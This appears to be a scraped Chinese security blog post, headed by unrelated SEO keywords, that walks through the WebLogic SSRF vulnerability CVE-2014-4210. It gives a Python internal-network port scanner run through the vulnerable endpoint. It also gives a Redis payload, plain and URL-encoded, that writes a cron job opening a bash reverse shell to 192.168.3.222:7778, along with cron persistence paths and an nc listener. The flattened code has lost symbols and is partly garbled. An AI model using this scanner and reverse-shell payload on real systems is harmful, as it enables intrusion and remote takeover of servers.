怎样做o2o网站,收银系统一套多少钱,怎么做网站访问被拒绝,做网站主流语言给个关注#xff1f;宝儿#xff01; 给个关注#xff1f;宝儿#xff01; 给个关注#xff1f;宝儿#xff01; 复习一下ssrf的原理及危害#xff0c;并且以weblog的ssrf漏洞为案例 漏洞原理 SSRF(Server-side Request Forge, 服务端请求伪造) 通常用于控制web进而…给个关注宝儿 给个关注宝儿 给个关注宝儿 复习一下ssrf的原理及危害并且以weblog的ssrf漏洞为案例 漏洞原理 SSRF(Server-side Request Forge, 服务端请求伪造) 通常用于控制web进而探测内网服务以及攻击内网脆弱应用 即当作跳板机可作为ssrfsocks代理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下SSRF攻击的目标是从外网无法访问的内部系统。SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容加载指定地址的图片下载等等。 通俗的说比如这样一个url如果我们将换为与该服务器相连的内网服务器地址会产生什么效果呢比如127.0.0.1、10.0.0.1、192.168.1.1等等如果存在该内网地址就会返回1xx 2xx 之类的状态码不存在就会返回其他的状态码所以:如果应用程序对用户提供的URL和远端服务器返回的信息没有进行合适的验证和过滤就可能存在这种服务端请求伪造的缺陷。 漏洞产生 由于服务端提供了从其他服务器应用获取数据的功能且没有对地址和协议等做过滤和限制。 漏洞信息 CVE-2014-4210 版本10.0.2,10.3.6,12.1.1,12.1.2.0.0 复现过程 访问 http://218.244.139.43:7001/uddiexplorer/ 无需登录即可查看uddiexplorer应用。 SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT如http://127.0.0.1:7001 抓包观察发现operator参数传递了一个URL服务器回去访问这个url可以思考它是否可以去访问内网主机是否有SSRF漏洞 测试在访问不用的URL和端口时返回的结果是否相同 访问url和7001端口返回一个404 状态码 访问一个不存在的端口 根据报错的不同可以进行内网探测首先需要知道他的内网网段、 docker内网网段为172.18.0.xxx 简单脚本Python2以知道网段为前提 import thread import time import re import requestsdef ite_ip(ip):for i in range(1, 256):final_ip {ip}.{i}.format(ipip, ii)print final_ipthread.start_new_thread(scan, (final_ip,))time.sleep(3)def scan(final_ip):ports (21, 22, 23, 53, 80, 135, 139, 443, 445, 1080, 1433, 1521, 3306, 3389, 4899, 8080, 7001, 8000,6389,6379)for port in ports:vul_url http://your ip:7001//uddiexplorer/SearchPublicRegistries.jsp?operatorhttp://%s:%srdoSearchnametxtSearchnamesdftxtSearchkeytxtSearchforselforBusinesslocationbtnSubmitSearch % (final_ip,port)try:#print vul_urlr requests.get(vul_url, timeout15, verifyFalse)result1 re.findall(weblogic.uddi.client.structures.exception.XML_SoapException,r.content)result2 re.findall(but could not connect, r.content)result3 re.findall(No route to host, r.content)if len(result1) ! 0 and len(result2) 0 and len(result3) 0:print [!]final_ip : portexcept Exception, e:passif __name__ __main__:ip 172.18.0if ip:print ipite_ip(ip)else:print no ip反弹shell 利用这个6379端口注入http头将反弹shell脚本写入 textset 1 “\n\n\n\n* * * * * root bash -i /dev/tcp/192.168.3.222/7778 01\n\n\n\n” config set dir /etc/ config set dbfilename crontab saveaaa使用url编码 text%0A%0Aset%201%20%E2%80%9C%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.3.222%2F7778%200%3E%261%5Cn%5Cn%5Cn%5Cn%E2%80%9D%0Aconfig%20set%20dir%20%2Fetc%2F%0Aconfig%20set%20dbfilename%20crontab%0Asave%20%0A%0Aaaa脚本含义 . 发送三条redis命令将弹shell脚本写入/etc/crontab 分别为 1. *号意思是这条命令一直执行也就是一直执行反弹shell的命令 2. 置redis备份文件的工作目录 3. 写入哪个文件如果不存在就创建 crontap 就是linux定时任务的位置即守护进程 /etc/crontab 这个是肯定的 * /etc/cron.d/*将任意文件写到该目录下效果和crontab相同格式也要和/etc/crontab相同。漏洞利用这个目录可以做到不覆盖任何其他文件的情况进行弹shell。 /var/spool/cron/root centos系统下root用户的cron文件 /var/spool/cron/crontabs/root debian系统下root用户的cron文件 开启端口监听 nc -lvvnp 7778收到数据包反弹shell成功 看完点赞关注不迷路!!! 后续继续更新优质安全内容!!!